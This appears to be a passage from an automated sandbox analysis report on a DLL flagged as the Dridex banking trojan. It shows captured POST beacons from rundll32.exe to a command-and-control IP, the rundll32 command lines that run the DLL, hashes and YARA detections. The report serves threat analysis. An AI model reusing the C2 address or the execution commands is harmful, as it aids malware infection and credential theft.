                                                                                                        2021-10-28 03:00:56 UTC439OUTData Raw: e3 0b 66 a3 10 08 27 a5 5c b0 56 a3 18 3f 4c 94 e5 ad 73 ac f8 a8 f0 12 06 42 87 c9 8b 52 90 1a a4 a0 eb 66 6f 05 8b e5 cd f9 f4 b2 d6 48 9d 88 af e2 28 69 90 0b 4d 46 56 7a df 0f 20 40 2a f7 6d aa 9c 52 11 f1 6b 95 08 e9 d6 37 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: f'\V?LsBRfoH(iMFVz @*mRk7kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 03:00:57 UTC443INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 03:00:57 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        89192.168.2.650186192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 03:00:57 UTC444OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4862
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 03:00:57 UTC444OUTData Raw: 46 8c 83 6e 10 08 27 a5 5c b0 56 a3 18 3f 4c 94 e5 ad 73 ac f8 a8 f0 12 06 42 87 c9 8b 52 90 1a a4 a0 eb 66 6f 05 8b e5 cd f9 f4 b2 d6 48 9d 88 af e2 28 69 90 0b 4d 46 56 7a df 0f 20 40 2a f7 6d aa 9c 52 11 f1 6b 95 08 e9 d6 37 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: Fn'\V?LsBRfoH(iMFVz @*mRk7k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 03:00:58 UTC448INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 03:00:58 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        9192.168.2.649791192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:58:18 UTC44OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4850
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:58:18 UTC45OUTData Raw: e3 0b 66 a3 10 08 27 a5 5c b0 56 a3 18 3f 4c 94 e5 ad 73 ac f8 a8 f0 12 06 42 87 c9 8b 52 90 1a a4 a0 eb 66 6f 05 8b e5 cd f9 f4 b2 d6 48 9d 88 af e2 28 69 90 0b 4d 46 56 7a df 0f 20 40 2a f7 6d aa 9c 52 11 f1 6b 95 08 e9 d6 37 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: f'\V?LsBRfoH(iMFVz @*mRk7kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:58:19 UTC49INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:58:19 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        90192.168.2.650190192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 03:01:00 UTC449OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4850
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 03:01:00 UTC449OUTData Raw: e3 0b 66 a3 10 08 27 a5 5c b0 56 a3 18 3f 4c 94 e5 ad 73 ac f8 a8 f0 12 06 42 87 c9 8b 52 90 1a a4 a0 eb 66 6f 05 8b e5 cd f9 f4 b2 d6 48 9d 88 af e2 28 69 90 0b 4d 46 56 7a df 0f 20 40 2a f7 6d aa 9c 52 11 f1 6b 95 08 e9 d6 37 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: f'\V?LsBRfoH(iMFVz @*mRk7kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 03:01:00 UTC453INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 03:01:00 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Code Manipulations

                                                                                                        Statistics

                                                                                                        Behavior

                                                                                                        Click to jump to process

                                                                                                        System Behavior

                                                                                                        Analysis Process: loaddll32.exe PID: 6384 Parent PID: 4456

                                                                                                        General

                                                                                                        Start time:04:56:54
                                                                                                        Start date:28/10/2021
                                                                                                        Path:C:\Windows\System32\loaddll32.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:loaddll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.8232.dll'
                                                                                                        Imagebase:0xaa0000
                                                                                                        File size:893440 bytes
                                                                                                        MD5 hash:72FCD8FB0ADC38ED9050569AD673650E
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Yara matches:
                                                                                                        • Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000000.00000002.888568308.000000006EFE1000.00000020.00020000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000000.00000003.478698643.0000000001270000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                        Reputation:moderate

                                                                                                        Analysis Process: cmd.exe PID: 6396 Parent PID: 6384

                                                                                                        General

                                                                                                        Start time:04:56:55
                                                                                                        Start date:28/10/2021
                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.8232.dll',#1
                                                                                                        Imagebase:0x2a0000
                                                                                                        File size:232960 bytes
                                                                                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high

                                                                                                        Analysis Process: rundll32.exe PID: 6408 Parent PID: 6384

                                                                                                        General

                                                                                                        Start time:04:56:55
                                                                                                        Start date:28/10/2021
                                                                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.8232.dll,Bluewing
                                                                                                        Imagebase:0x1340000
                                                                                                        File size:61952 bytes
                                                                                                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Yara matches:
                                                                                                        • Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000002.00000003.433688939.0000000004C00000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                        Reputation:high

                                                                                                        Analysis Process: rundll32.exe PID: 6424 Parent PID: 6396

                                                                                                        General

                                                                                                        Start time:04:56:55
                                                                                                        Start date:28/10/2021
                                                                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.8232.dll',#1
                                                                                                        Imagebase:0x1340000
                                                                                                        File size:61952 bytes
                                                                                                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Yara matches:
                                                                                                        • Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000003.00000002.898148863.000000006EFE1000.00000020.00020000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000003.00000003.435699567.0000000000610000.00000040.00000010.sdmp, Author: Joe Security
                                                                                                        Reputation:high

                                                                                                        Analysis Process: rundll32.exe PID: 6464 Parent PID: 6384

                                                                                                        General

                                                                                                        Start time:04:56:59
                                                                                                        Start date:28/10/2021
                                                                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.8232.dll,Earth
                                                                                                        Imagebase:0x1340000
                                                                                                        File size:61952 bytes
                                                                                                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Yara matches:
                                                                                                        • Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000004.00000003.467247040.0000000004B00000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                        Reputation:high

                                                                                                        Analysis Process: rundll32.exe PID: 6480 Parent PID: 6384

                                                                                                        General

                                                                                                        Start time:04:57:06
                                                                                                        Start date:28/10/2021
                                                                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.8232.dll,Masterjust
                                                                                                        Imagebase:0x1340000
                                                                                                        File size:61952 bytes
                                                                                                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Yara matches:
                                                                                                        • Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000005.00000003.475590656.0000000000DE0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                        Reputation:high

                                                                                                        Disassembly

                                                                                                        Code Analysis

                                                                                                        Reset < >